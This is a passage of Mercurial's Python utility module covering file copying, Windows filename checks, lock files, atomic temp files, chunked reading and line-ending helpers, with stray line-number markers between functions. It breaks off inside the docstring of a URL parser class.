    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # only attempt hardlinks when src and dst share a device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset the child's progress by what we've done so far
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed: copy this file and stop trying to link
                # subsequent files as well
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1875
1875
# basenames (sans extension) that Windows reserves for device files
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# characters that may not appear in Windows filenames
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # examine each path component individually
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            # ASCII control characters (0x00-0x1f) are invalid
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # note: "n not in '..'" is a substring test, deliberately letting
        # the '.' and '..' path components through
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1928
1928
# pick the platform-appropriate filename checker and wall-clock timer
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # Python >= 3.3: prefer the high-resolution monotonic counter
    timer = time.perf_counter
1938
1938
def makelock(info, pathname):
    """Create a lock file atomically if possible

    The lock info is stored as the target of a symlink when the platform
    supports it, and as the content of an exclusively-created regular file
    otherwise.

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # an existing lock must be reported to the caller
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    # fall back to a regular file holding the info; O_EXCL keeps creation
    # atomic with respect to other lockers
    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    try:
        os.write(ld, info)
    finally:
        # close the descriptor even if the write fails (e.g. disk full);
        # the old code leaked it in that case
        os.close(ld)
1957
1957
def readlock(pathname):
    # the common case: the lock is a symlink whose target carries the info
    try:
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL: not a symlink; ENOSYS: readlink unsupported here —
        # both mean "try the regular-file flavor" instead of failing
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    # fall back to the plain file written by makelock()
    fp = posixfile(pathname, 'rb')
    contents = fp.read()
    fp.close()
    return contents
1970
1970
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # no descriptor available: stat by name instead
        return os.stat(fp.name)
    return os.fstat(fd)
1977
1977
1978 # File system features
1978 # File system features
1979
1979
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st1 = os.lstat(path)
    dirname, base = os.path.split(path)
    folded = base.upper()
    if folded == base:
        folded = base.lower()
    if folded == base:
        # nothing to fold: no evidence against case sensitivity
        return True
    try:
        st2 = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the case-folded twin doesn't resolve: fs distinguishes case
        return True
    if st2 == st1:
        # both spellings reach the same file: case-insensitive
        return False
    return True
2002
2002
try:
    import re2
    # None means "re2 is importable but not yet validated"; _re._checkre2()
    # resolves it to a definitive True/False on first use
    _re2 = None
except ImportError:
    _re2 = False
2008
2008
class _re(object):
    # thin facade over the 're' module that transparently prefers the
    # faster re2 engine when it is installed and functional
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes flags inline rather than as an argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern not supported by re2; fall back to stdlib re
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()
2053
2053
# per-directory cache of {normcased name: on-disk name} mappings
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # (str.replace returns a new string; the previous code discarded the
    # result, leaving '\' unescaped inside the character classes below)
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
2096
2096
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        # derive the link name from the temp name ('...1~' -> '...2~')
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the probe files
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2125
2125
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    sep = pycompat.ossep
    altsep = pycompat.osaltsep
    # keep the bare or/and expression so the exact (possibly non-boolean)
    # truthy/falsy return values match the historical behavior
    return path.endswith(sep) or (altsep and path.endswith(altsep))
2130
2130
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    return path.split(pycompat.ossep)
2138
2138
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    if getattr(osutil, 'isgui', None):
        # check if a CoreGraphics session is available
        return osutil.isgui()
    # pure build; use a safe default
    return True
2153
2153
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source doesn't exist: the fresh empty temp file will do
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a half-written temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2194
2194
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for *path*; a missing file yields stat=None."""
        try:
            st = os.stat(path)
        except OSError as err:
            # only ENOENT means "file absent"; anything else is fatal
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object."""
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        new = self.stat
        try:
            prior = old.stat
        except AttributeError:
            # 'old' is not filestat-like at all
            return False
        if new is None or prior is None:
            # equal only when both describe a missing file
            return new is None and prior is None
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (new.st_size == prior.st_size and
                    new[stat.ST_CTIME] == prior[stat.ST_CTIME] and
                    new[stat.ST_MTIME] == prior[stat.ST_MTIME])
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime one second past the old one, wrapping at 2**31-1
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno != errno.EPERM:
                raise
            # utime() on a file created by another user raises EPERM
            # when this process lacks privileges; report "not avoided"
            return False
        return True

    def __ne__(self, other):
        return not (self == other)
2296
2296
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        # temporary copy next to the target; 'w' mode allows an empty copy
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Flush the temp file and atomically rename it over the target.

        With checkambig=True, compares the target's stat before and
        after the rename and bumps mtime by one second if the change
        would otherwise be undetectable (see filestat.isambig).
        """
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # oldstat is falsy when checkambig is off, short-circuiting
            # the ambiguity handling below
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw away all writes: delete the temp file, never touch target."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, roll back if the with-block raised
        if exctype is not None:
            self.discard()
        else:
            self.close()
2359
2359
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # prune any parent directories that the removal left empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2371
2371
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        # a file that is already gone counts as success
        if err.errno == errno.ENOENT:
            return
        raise
2379
2379
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        eno = err.errno
        if eno == errno.EEXIST:
            return
        if eno != errno.ENOENT or not name:
            raise
        # a parent is missing: create it recursively, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as retryerr:
            # catch EEXIST to handle races with concurrent creators
            if retryerr.errno == errno.EEXIST:
                return
            raise
    # apply the requested mode only to directories we actually created
    if mode is not None:
        os.chmod(name, mode)
2407
2407
def readfile(path):
    """Return the entire contents of *path* as a bytes string."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2411
2411
def writefile(path, text):
    """Create or truncate *path* and write the bytes *text* to it."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2415
2415
def appendfile(path, text):
    """Append the bytes *text* to *path*, creating it if necessary."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2419
2419
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # cap chunk size at 1MB by re-slicing oversized chunks into
            # 256KB pieces, so a single huge chunk can't blow up memory
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        # buffered chunks not yet consumed by read()
        self._queue = collections.deque()
        # read offset into the chunk at the head of the queue
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue with roughly 256KB of buffered data
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
2499
2499
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    remaining = limit
    while True:
        nbytes = size if remaining is None else min(remaining, size)
        # nbytes == 0 short-circuits: never issue a zero-length read
        chunk = nbytes and f.read(nbytes)
        if not chunk:
            break
        if remaining:
            remaining -= len(chunk)
        yield chunk
2520
2520
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        """Read up to *n* bytes; n < 0 means "everything still allowed"."""
        remaining = self._left
        if not remaining:
            return b''

        if n < 0:
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        """Fill buffer *b* from the capped stream; return byte count."""
        data = self.read(len(b))
        if data is None:
            return None

        count = len(data)
        b[0:count] = data
        return count
2557
2557
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # below every threshold: fall back to the last (smallest) unit,
        # formatting the raw count without scaling
        return unittable[-1][2] % count

    return go
2568
2568
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    # check ordering first so (0, -5) reports the range error, matching
    # the historical message priority
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline <= 0:
        raise error.ParseError(_("fromline must be strictly positive"))
    # convert the 1-based inclusive input to a 0-based half-open range
    return fromline - 1, toline
2589
2589
# render a byte count as a human-readable string, choosing the largest
# unit whose formatted value keeps at least the shown precision
# (e.g. 1536 -> "1.50 KB"); the final entry is the plain-bytes fallback
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2602
2602
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._dest = fp
        self._transform = encode

    def close(self):
        """Close the wrapped file."""
        self._dest.close()

    def flush(self):
        """Flush the wrapped file."""
        self._dest.flush()

    def write(self, data):
        """Transform *data* and write it, returning the inner write result."""
        return self._dest.write(self._transform(data))
2618
2618
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error. Used by tolf()/tocrlf() below.
_eolre = remod.compile(br'\r*\n')
2623
2623
def tolf(s):
    """Normalize line endings in *s* (bytes) to bare LF."""
    return _eolre.sub('\n', s)
2626
2626
def tocrlf(s):
    """Normalize line endings in *s* (bytes) to CRLF."""
    return _eolre.sub('\r\n', s)
2629
2629
def _crlfwriter(fp):
    """Wrap *fp* so that written data has its line endings converted to CRLF."""
    return transformingwriter(fp, tocrlf)
2632
2632
# Pick end-of-line conversion helpers matching the host platform's native
# line separator; on LF platforms all three are identity no-ops.
if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity
2641
2641
if (pyplatform.python_implementation() == 'CPython' and
        sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            # keep the trailing partial line for the next read
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        # NOTE(review): 'file' here is the Python 2 builtin type; this
        # branch is unreachable on Python 3 by the version guard above.
        fastpath = True
        if type(fp) is file:
            # regular on-disk files don't hit EINTR; take the fast path
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp
2713
2713
def iterlines(iterator):
    """Yield each individual line from an iterable of multi-line chunks."""
    for block in iterator:
        lines = block.splitlines()
        for ln in lines:
            yield ln
2718
2718
def expandpath(path):
    """Expand environment variables, then ~user constructs, in *path*."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2721
2721
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2736
2736
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # os.wait() reaps the child and returns a (pid, status) tuple,
        # which is recorded so the polling loop below can notice it.
        terminated.add(os.wait())
    prevhandler = None
    # SIGCHLD does not exist on Windows; fall back to pure PID polling there.
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # re-check condfn() after the liveness test to avoid a race
            # where the child signalled readiness just before exiting
            # our poll window
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # always restore the previous SIGCHLD disposition
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)
2771
2771
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    if not fn:
        fn = lambda s: s
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        prefix_char = prefix[1:] if len(prefix) > 1 else prefix
        # a doubled prefix character expands to the prefix itself
        mapping[prefix_char] = prefix_char
    matcher = remod.compile(br'%s(%s)' % (prefix, patterns))
    return matcher.sub(lambda m: fn(mapping[m.group()[1:]]), s)
2796
2796
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        # not numeric; resolve it as a service name below
        try:
            return socket.getservbyname(pycompat.sysstr(port))
        except socket.error:
            raise error.Abort(
                _("no port number associated with service '%s'") % port)
2813
2814
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
